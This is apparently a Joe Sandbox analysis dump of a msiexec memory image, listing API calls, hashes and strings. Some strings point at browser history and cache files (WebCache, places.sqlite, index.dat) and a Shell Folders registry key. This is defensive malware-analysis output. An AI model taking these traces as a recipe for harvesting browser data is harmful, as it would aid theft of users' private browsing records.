                      • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: AddressHandleModuleProcProcessTimes
                      • String ID: GetProcessTimes$kernel32.dll
                      • API String ID: 1714573020-3385500049
                      • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                      • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                      • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                      • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                      APIs
                      • memset.MSVCRT ref: 004087D6
                        • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                        • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                      • memset.MSVCRT ref: 00408828
                      • memset.MSVCRT ref: 00408840
                      • memset.MSVCRT ref: 00408858
                      • memset.MSVCRT ref: 00408870
                      • memset.MSVCRT ref: 00408888
                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                      • String ID:
                      • API String ID: 2911713577-0
                      • Opcode ID: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                      • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                      • Opcode Fuzzy Hash: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                      • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                      APIs
                      • memcmp.MSVCRT(?,?,00000004,?,00000065,004381DF,00000065,00000000,00000007,?,00000000), ref: 0041F202
                      • memcmp.MSVCRT(?,SQLite format 3,00000010,?,00000065,004381DF,00000065,00000000), ref: 0041F22D
                      • memcmp.MSVCRT(?,@ ,00000003,?,?,00000065,004381DF,00000065,00000000), ref: 0041F299
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: memcmp
                      • String ID: @ $SQLite format 3
                      • API String ID: 1475443563-3708268960
                      • Opcode ID: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                      • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                      • Opcode Fuzzy Hash: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                      • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: _wcsicmpqsort
                      • String ID: /nosort$/sort
                      • API String ID: 1579243037-1578091866
                      • Opcode ID: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                      • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                      • Opcode Fuzzy Hash: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                      • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                      APIs
                      • memset.MSVCRT ref: 0040E60F
                      • memset.MSVCRT ref: 0040E629
                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                      Strings
                      • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                      • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: memsetwcslen$AttributesFilewcscatwcscpy
                      • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                      • API String ID: 3354267031-2114579845
                      • Opcode ID: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                      • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                      • Opcode Fuzzy Hash: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                      • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                      APIs
                      Strings
                      • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: memset
                      • String ID: only a single result allowed for a SELECT that is part of an expression
                      • API String ID: 2221118986-1725073988
                      • Opcode ID: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                      • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                      • Opcode Fuzzy Hash: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                      • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                      APIs
                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                      • memcmp.MSVCRT(?,0044EC68,00000010,?,00000000,?), ref: 00444BA5
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: AddressProc$memcmp
                      • String ID: $$8
                      • API String ID: 2808797137-435121686
                      • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                      • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                      • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                      • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                      APIs
                        • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                        • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                        • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                        • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                        • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                        • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                        • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                        • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                        • Part of subcall function 0040E01E: CloseHandle.KERNELBASE(?), ref: 0040E13E
                      • CloseHandle.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                        • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                        • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                        • Part of subcall function 0040E2AB: memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,76232EE0), ref: 0040E3EC
                      • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                      • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                        • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                        • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                        • Part of subcall function 0040E175: free.MSVCRT ref: 0040E28B
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: File$Handle$Close$ProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
                      • String ID:
                      • API String ID: 1979745280-0
                      • Opcode ID: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                      • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                      • Opcode Fuzzy Hash: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                      • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                      APIs
                        • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                      • memset.MSVCRT ref: 00414C87
                      • wcscpy.MSVCRT ref: 00414CFC
                        • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                      Strings
                      • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: AddressProcVersionmemsetwcscpy
                      • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                      • API String ID: 4182280571-2036018995
                      • Opcode ID: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                      • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                      • Opcode Fuzzy Hash: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                      • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                      APIs
                        • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                        • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                        • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                        • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                      • memset.MSVCRT ref: 00403A55
                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                        • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                        • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                        • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                        • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: memsetwcscatwcslen$free$AttributesFilememcpywcscpy
                      • String ID: history.dat$places.sqlite
                      • API String ID: 2641622041-467022611
                      • Opcode ID: 9ef9f50687dcf4a121c62199c75cab5672ca0efd30876004e019efa0877f52a8
                      • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                      • Opcode Fuzzy Hash: 9ef9f50687dcf4a121c62199c75cab5672ca0efd30876004e019efa0877f52a8
                      • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                      APIs
                        • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                        • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                        • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                      • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                      • GetLastError.KERNEL32 ref: 00417627
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: ErrorLast$File$PointerRead
                      • String ID:
                      • API String ID: 839530781-0
                      • Opcode ID: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                      • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                      • Opcode Fuzzy Hash: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                      • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: FileFindFirst
                      • String ID: *.*$index.dat
                      • API String ID: 1974802433-2863569691
                      • Opcode ID: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                      • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                      • Opcode Fuzzy Hash: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                      • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                      APIs
                      • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                      • GetLastError.KERNEL32 ref: 004175A2
                      • GetLastError.KERNEL32 ref: 004175A8
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: ErrorLast$FilePointer
                      • String ID:
                      • API String ID: 1156039329-0
                      • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                      • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                      • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                      • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                      APIs
                      • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                      • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                      • CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: File$CloseCreateHandleTime
                      • String ID:
                      • API String ID: 3397143404-0
                      • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                      • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                      • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                      • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                      APIs
                      • GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                      • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                      • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: Temp$DirectoryFileNamePathWindows
                      • String ID:
                      • API String ID: 1125800050-0
                      • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                      • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                      • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                      • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                      APIs
                      • Sleep.KERNEL32(00000064), ref: 004175D0
                      • CloseHandle.KERNELBASE(?,00000000,?,0045DBC0,00417C24,?,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: CloseHandleSleep
                      • String ID: }A
                      • API String ID: 252777609-2138825249
                      • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                      • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                      • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                      • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID:
                      • String ID: d
                      • API String ID: 0-2564639436
                      • Opcode ID: 9081757c99ca3a842b21ef208fcf0aba28da60ac56b45099a1a2f4719e1e1e22
                      • Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
                      • Opcode Fuzzy Hash: 9081757c99ca3a842b21ef208fcf0aba28da60ac56b45099a1a2f4719e1e1e22
                      • Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: memset
                      • String ID: BINARY
                      • API String ID: 2221118986-907554435
                      • Opcode ID: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                      • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                      • Opcode Fuzzy Hash: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                      • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: _wcsicmp
                      • String ID: /stext
                      • API String ID: 2081463915-3817206916
                      • Opcode ID: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                      • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                      • Opcode Fuzzy Hash: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                      • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: _wcsicmp
                      • String ID: .#v
                      • API String ID: 2081463915-507759092
                      • Opcode ID: 8ecd19cd50b91feb9ece7647b88d70c74935930258f67524a15d6916c2203edb
                      • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                      • Opcode Fuzzy Hash: 8ecd19cd50b91feb9ece7647b88d70c74935930258f67524a15d6916c2203edb
                      • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                      APIs
                        • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                      • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                        • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                        • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                        • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                        • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                      • CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                        • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
                      • String ID:
                      • API String ID: 2445788494-0
                      • Opcode ID: c9e98542c376da042cc7e9fe0c2757e169e3ab3aa14d13962e5d64e4fd764852
                      • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                      • Opcode Fuzzy Hash: c9e98542c376da042cc7e9fe0c2757e169e3ab3aa14d13962e5d64e4fd764852
                      • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                      APIs
                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                      • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                      • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                      • String ID:
                      • API String ID: 3150196962-0
                      • Opcode ID: 86234f6dcfe5183eb12d2d600ddfcc7b691cb690ca4801b5099eddac0042a321
                      • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                      • Opcode Fuzzy Hash: 86234f6dcfe5183eb12d2d600ddfcc7b691cb690ca4801b5099eddac0042a321
                      • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                      APIs
                      Strings
                      • failed to allocate %u bytes of memory, xrefs: 004152F0
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: malloc
                      • String ID: failed to allocate %u bytes of memory
                      • API String ID: 2803490479-1168259600
                      • Opcode ID: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                      • Instruction ID: 101c51dc2fc609bd9d1e0073b1fda66f00508c6688545faad3e4fa21ce9dc4bd
                      • Opcode Fuzzy Hash: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                      • Instruction Fuzzy Hash: 11E0DFB7B02A12A3C200561AED01AC667959FC122572B013BF92CD3681E638D89687A9
                      APIs
                      • memset.MSVCRT ref: 0041BDDF
